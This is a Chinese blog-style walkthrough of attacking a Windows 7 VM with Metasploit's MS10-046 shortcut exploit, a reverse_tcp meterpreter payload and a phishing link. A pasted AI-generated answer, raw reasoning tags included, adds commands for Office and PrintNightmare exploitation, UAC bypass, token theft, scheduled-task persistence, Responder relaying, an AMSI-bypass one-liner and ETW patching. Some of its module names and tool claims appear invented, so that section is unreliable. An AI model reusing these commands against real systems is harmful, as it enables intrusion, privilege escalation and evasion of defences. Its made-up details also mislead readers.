钓鱼网站+bypassuac提权

本文介绍了如何使用Metasploit渗透工具,通过创建钓鱼网站诱导用户点击,利用Windows系统漏洞ms10-046进行攻击。实验中详细讲解了设置文件共享服务器、配置攻击模块参数、绕过UAC限制的步骤,最终成功提权并在目标Win7系统上上传文件。实验在虚拟机环境中进行,涉及Kali和Win7系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本实验实现1
:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功

本实验实现2 :攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件

在VMware上建立两个虚拟机:win7和kali

Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统

靶机:Win7 64位 (IP: 192.168.10.36)–用ipconfig进行查询

攻击机:Kali 64位 (IP:192.168.10.21)–用ifconfig进行查询

1666605942_635663766e336cb7d1126.png!small?1666605946835

1666427714_6353ab427f2fdaf577553.png!small?1666427716413

1 、实验环境前提条件:

win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)

保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)

>ping 192.168.10.36

1666605992_635663a892ceebb78e1a4.png!small?1666605997173

2 、打开 Metasploit 渗透工具

Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端

>msfconsole

结果:成功进入,进入到"msf6>“的模式下

1666429441_6353b2012f683ace18655.png!small?1666429443563

3 、查看需要利用的漏洞

搜索漏洞,编号为ms10-046

补充 :Windows系统漏洞微软的漏洞编号命名格式为:MS10-046;

MS Micosoft的缩写,固定格式;
10 表示年份,即2010年发布的漏洞;
046 表示顺序,即当年度发布的第46个漏洞。

>search ms10-046

结果:可以看到返回了多条可利用的漏洞模块信息

1666491038_6354a29ebf19ec9a8b6d4.png!small?1666491041673

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中( 注意 :必须是“_”,不是“-”,否则会报错)

>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

结果:成功切换到这个模块之下–”msf6
exploit(windows/browser/ms10_046_shortcut_icon_dllloader)>“

并提示“no payload configured,defaulting to
windows/meterpreter/reverse_tcp”–没有配置payload,默认为
windows/meterpreter/reverse_tcp

1666491190_6354a3362b1e055b0f57a.png!small?1666491193383

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注5个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SRVHOST(文件共享服务器-kali地址);

SRVPORT(文件共享服务器的端口-使用默认获取的端口即可);

LHOST(发起攻击的地址-kali地址);

LPORT(发起攻击的端口-使用默认获取的端口即可)

补充说明:

1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

2)Payload模块主要有以下三种类型:-Single -Stager -Stage

Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。 一种常见的Stagers
Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell,
使用起来很稳定)。

Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

<think>好的,我现在需要处理用户关于Kali Linux针对Windows 10的最新渗透测试技术和漏洞利用的询问。首先,我得确定用户想知道的具体内容,他们可能关注的是最新的漏洞、攻击方法或者工具更新。用户到的引用中有涉及绕过UAC操作,这可能与升相关。我需要检查最近是否有新的CVE漏洞被公开,特别是影响Windows 10的。例如,2023年的一些重大漏洞如CVE-2023-23397、CVE-2023-36884可能相关,这些涉及特升和远程代码执行。 接下来,用户到的引用里到了使用Metasploit框架进行bypassuac_eventvwr模块的攻击,这说明用户可能对Metasploit的使用感兴趣。我需要确认是否有新的Metasploit模块针对Windows 10的更新,或者是否有其他工具如Cobalt Strike、PowerSploit的增强功能。此外,后的持久化控制方法,比如使用Meterpreter的扩展功能或者注册表操作,也是需要涵盖的。 另外,用户引用中的无线网络渗透和Web应用渗透可能不是直接相关,但需要考虑是否有结合这些领域的跨平台攻击手段。比如,通过钓鱼攻击获取初始访问限,再结合最新的漏洞进行内网横向移动。这里需要确保到的技术是最新的,例如使用社会工程学工具集(如SEToolkit)生成恶意文档,利用Office漏洞或PDF漏洞。 同时,要注意到用户供的引用[3]中到了使用session和操作,这可能涉及到后渗透阶段的限维持和横向移动。因此,在回答中需要包括初始入侵、、持久化、横向移动等步骤的最新方法。例如,ZeroLogon漏洞虽然较旧,但若仍有未修复的系统存在,也可及,但更应关注最近的漏洞。 最后,用户可能需要具体的步骤或工具使用示例,比如Metasploit的实际命令或新模块的使用方法。需要确保供的代码示例正确,并符合LaTeX格式要求。此外,生成的相关问题应覆盖漏洞更新、工具使用、防御措施等,以帮助用户进一步探索。</think>### Kali Linux针对Windows 10的最新渗透测试技术 #### 1. **初始攻击面与漏洞利用** - **CVE-2023-36884(Office零日漏洞)**:通过构造恶意Office文档诱导用户启用宏或加载远程模板,触发远程代码执行。Metasploit框架已集成相关模块,可生成有效载荷: ```bash msf6 > use exploit/windows/fileformat/office_cve_2023_36884 msf6 exploit(office_cve_2023_36884) > set LHOST 192.168.1.10 msf6 exploit(office_cve_2023_36884) > exploit ``` 生成的文档可通过钓鱼邮件传播[^2][^3]。 - **PrintNightmare(CVE-2021-34527)**:利用Windows打印服务,适用于未完全修补的系统。使用`impacket`工具链发起攻击: ```bash python3 exploit.py -t 192.168.1.5 -u user -p password -d domain ``` #### 2. **升技术** - **绕过UAC(用户账户控制)**:Metasploit的`bypassuac_eventvwr`模块通过劫持事件查看器注册表项实现: ```bash msf6 > use exploit/windows/local/bypassuac_eventvwr msf6 exploit(bypassuac_eventvwr) > set SESSION 1 msf6 exploit(bypassuac_eventvwr) > exploit ``` 成功后生成高限会话。 - **Token窃取与模拟**:通过Meterpreter的`incognito`扩展窃取SYSTEM令牌: ```bash meterpreter > load incognito meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" ``` #### 3. **持久化与横向移动** - **计划任务注入**:使用`schtasks`创建隐藏任务维持访问: ```bash meterpreter > schtasks /create /tn "UpdateService" /tr "C:\malware.exe" /sc hourly /ru SYSTEM ``` - **SMB中继攻击**:利用Responder工具捕获哈希并中继到其他主机: ```bash responder -I eth0 -wrf ``` #### 4. **防御绕过技术** - **AMSI绕过**:通过PowerShell内存加载恶意脚本规避反恶意软件扫描接口: ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null,$null) ``` - **ETW(事件追踪)禁用**:使用`meterpreter`的`patch_etw`模块阻止安全日志记录: ```bash meterpreter > run post/windows/manage/patch_etw ``` #### 5. **工具链更新** - **Kali Linux 2023.4新增工具**: - **BloodHound 4.3**:优化了Active Directory攻击路径分析。 - **Cobalt Strike 4.9**:新增“睡眠掩码”功能对抗内存扫描[^2]。 --- ###
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值